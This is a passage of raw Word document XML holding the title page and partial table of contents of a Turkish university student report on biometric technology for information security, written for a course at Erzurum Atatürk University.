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F4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">                                        </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="772BEA5D" wp14:editId="6ACAEB9E">
            <wp:extent cx="2200275" cy="2200275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="5" name="Resim 5" descr="atau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uni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E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:noProof/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A56D36" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>ERZURUM ATATÜRK ÜN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>İ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>VERS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>İ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>TES</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>İ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A56D36" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>MÜHEND</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L</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K FAK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face" w:cs="Algerian"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Ü</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>LTES</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>İ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00A56D36" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face" w:cs="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">       B</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LG</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AYAR M</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face" w:cs="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Ü</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>HEND</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L</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>İĞİ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> B</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face" w:cs="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Ö</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face" w:cs="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Ü</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face" w:cs="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Ü</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Baskerville Old Face" w:hAnsi="Baskerville Old Face" w:cs="Baskerville Old Face"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>BMS 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A56D36">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve">02 : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Bilgisayar Bilgi Yönetimi ve Güvenliği</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524E00">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Information  security  management  handbook</w:t>
      </w:r>
      <w:r w:rsidRPr="00524E00">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:br/>
        <w:t>(Bilgi güvenliği yönetimi el  kitabı)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00524E00" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>120757017    Hilâl Tansu YILDIRIM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Section 1.1.1-1.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="-2138089698"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="TBal"/>
            <w:spacing w:before="0"/>
            <w:rPr>
              <w:b/>
              <w:color w:val="auto"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b/>
              <w:color w:val="auto"/>
            </w:rPr>
            <w:t>İçindekiler :</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
          </w:pPr>
          <w:r w:rsidRPr="00524E00">
            <w:rPr>
              <w:rFonts w:cstheme="minorHAnsi"/>
              <w:b/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>BİYOMETRİK  TEKNOLOJİ İLE GÜVENLİĞİ ARTTIRMA</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="minorHAnsi"/>
              <w:b/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:t>1</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Giriş</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>1</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Biyometri Temelleri</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>1</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Biyometri Nasıl Çalışır?</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>2</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Biyometrik Özellikler</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>3</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Biyometri için Ortak Kullanımlar</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>3</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Biyometrik Ölçüm Faktörleri</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>4</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Biyometrik Ölçüm</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>6</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Uygulama sorunları</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>9</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Biyometrik teknolojiler</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>12</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Biyometrik standartlar</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>20</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Sonuç</w:t>
          </w:r>
          <w:r w:rsidRPr="00524E00">
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r w:rsidRPr="001C110C">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>21</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T1"/>
          </w:pPr>
          <w:r w:rsidRPr="003E4991">
            <w:rPr>
              <w:rFonts w:cstheme="minorHAnsi"/>
              <w:b/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>BİYOMETRİK: YENİ OLAN NEDİR?</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="minorHAnsi"/>
              <w:b/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:t>21</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Parmak izleri</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>21</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Göz tarama</w:t>
          </w:r>
          <w:r w:rsidRPr="000635DA">
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="dot"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>22</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00E77DF4" w:rsidRPr="000635DA" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
          <w:pPr>
            <w:pStyle w:val="T2"/>
            <w:rPr>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
